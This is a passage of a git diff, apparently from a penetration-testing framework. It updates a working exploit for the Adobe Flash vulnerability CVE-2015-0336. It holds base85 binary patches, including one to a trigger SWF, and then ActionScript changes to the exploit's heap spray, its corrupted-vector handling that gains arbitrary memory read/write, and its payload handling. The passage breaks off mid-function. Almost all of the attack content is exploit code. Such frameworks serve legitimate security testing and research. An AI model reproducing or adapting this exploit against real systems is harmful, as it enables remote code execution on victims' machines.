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
Fd;loH)6f6_

diff --git a/data/exploits/CVE-2015-0336/trigger.swf b/data/exploits/CVE-2015-0336/trigger.swf
index 643747118350da648945a89ddfa47ab8a577db12..3d87fc3c709953b67b2935bbebe695285948eb22 100755
GIT binary patch
delta 324
zcmV-K0lWUx0@DJJ7=Nl{hKjul6D#VMgv5|0r0iB&g;EGj)I>mk0iC+l5(EE-k-x$(
zD9=tegol&w`Q5$edxQ7}WDcA=7_$SNMjdoQhoIl=5YjDFDvak(@ggZM{CK&-p?PZ>
z!mW=6Y(*{7Y!;`;*IAjBn>@j@DG#TsxLm#@2xgDTyo6G=L4PU4d7f_QeVUZvI?J!q
zcu_zzc<8p<pA0{iI9*%Xd1firBY3C5f#%@w*o259E8^~2X4hH|ta!bTvaG}hbPEF5
zcf=(b2uAXwBacYxN-fMgRciy{T<SWw>(x0A^cgr8=9A*fz+VGR29eY!sJaY{jLNlb
z!uv->C?Xl?(>+SUxFcNC;9W`d-4R{4UHXrIH=K@@KfIZsd{`D$$Tm_Nh)F>n0}_>!
W$Lt8&2?L_P00030{{sLM%~GUpDx4qy

delta 325
zcmV-L0lNOv0@MPK7=J=CLRH1ug^3mQOG08u6H<07twJe;CTb#}zkp61Eiv$a82Kyw
zg7WNiLwGp(p5NVjzBh<(K;}T#!I<soH0q!eIt2aZ2_fA=rNVgr6fctE!jG3L?3=fy
zA>8_Cz*f{E&1P|me4Uk9xycheoAPkFip%9of?)QT%u6U`8-J8SoagC=-ls_!uCx3)
zjTZ$pgNIJL{mJlSiPN#AooAL}J%V={9B2*>k4=a;vLf!TWp=Igz>3%VD9cKGK(`=p
z-aQkSWFQ#H4~{${sVlXhcT=qmh;ymy;I3EaJkY1$T$oRaF9UxKG#NxvAED|pFfuCF
zwh8Ya6`_b^pgxZ)3FD4%O@ntO(RW95-FE0d{@rjoR{rp2g7RTmR3Y0)Z6GEEc?d{U
XP9C!(XeSJa{sI61|NjF3##2&LQ=OZH

diff --git a/external/source/exploits/CVE-2015-0336/Exploit.as b/external/source/exploits/CVE-2015-0336/Exploit.as
index 15abbc3256..9886106f71 100644
--- a/external/source/exploits/CVE-2015-0336/Exploit.as
+++ b/external/source/exploits/CVE-2015-0336/Exploit.as
@@ -28,8 +28,9 @@ package
         private var interval_id:uint
         private var trigger_swf:String 
         private var b64:Base64Decoder = new Base64Decoder()
-        private var payload:String
+        private var payload:ByteArray
         private var platform:String
+        private var original_length:uint = 0
 
         public function Exploit() 
         {
@@ -40,21 +41,23 @@ package
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
             b64.decode(b64_payload)
-            payload = b64.toByteArray().toString()
+            payload = b64.toByteArray()
             
             if (platform == 'win') { 
+                original_length = 0x1e
                 for (i = 0; i < 89698; i = i + 1) {
                     spray[i] = new Vector.<uint>(1014)
                     spray[i][0] = 0xdeadbeef
                     spray[i][1] = 0xdeedbeef
                     spray[i][2] = i
-                    spray[i][29] = 0x1a1e1429
+                    spray[i][29] = 0x14951429
                 }
 
                 for(i = 0; i < 89698; i = i + 1) {
                     spray[i].length = 0x1e
                 }
-            } else if (platform == 'linux') { 
+            } else if (platform == 'linux') {
+                original_length = 1022 
                 for (i = 0; i < 89698; i = i + 1) {
                     spray[i] = new Vector.<uint>(1022)
                     spray[i][0] = 0xdeadbeef
@@ -97,9 +100,11 @@ package
             for(var i:uint = 0; i < spray.length; i = i + 1) {
                 if (spray[i].length != 1022 && spray[i].length != 0x1e) {
                     Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
-                    spray[i][0x3ffffffe] = 0xffffffff
-                    spray[i][0x3fffffff] = spray[i][1023]
-                    uv = spray[i]
+                    spray[i][1022] = 0xffffffff                    
+                    spray[i + 1][0x3ffffbff] = spray[i][1023]
+                    spray[i + 1][0x3ffffbfe] = original_length
+                    uv = spray[i + 1]
+                    break
                 }
             }
 
diff --git a/external/source/exploits/CVE-2015-0336/ExploitByteArray.as b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as
index 0da3b307b4..a8da46df7b 100644
--- a/external/source/exploits/CVE-2015-0336/ExploitByteArray.as
+++ b/external/source/exploits/CVE-2015-0336/ExploitByteArray.as
@@ -31,7 +31,6 @@ package
 
         public function lets_ready():void
         {
-            Logger.log("[*] ExploitByteArray - lets_ready()")
             ba.endian = "littleEndian"
             if (platform == "linux") {
                 ba.length = 0xffffffff
@@ -40,7 +39,6 @@ package
 
         public function is_ready():Boolean
         {
-            Logger.log("[*] ExploitByteArray - is_ready() - 0x" + ba.length.toString(16))
             if (ba.length == 0xffffffff)
                 return true
 
@@ -72,10 +70,15 @@ package
 
         public function write(addr:uint, value:* = 0, zero:Boolean = true):void
         {
+            var i:uint
+
             if (addr) ba.position = addr
             if (value is String) {
-                for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
                 if (zero) ba.writeByte(0)
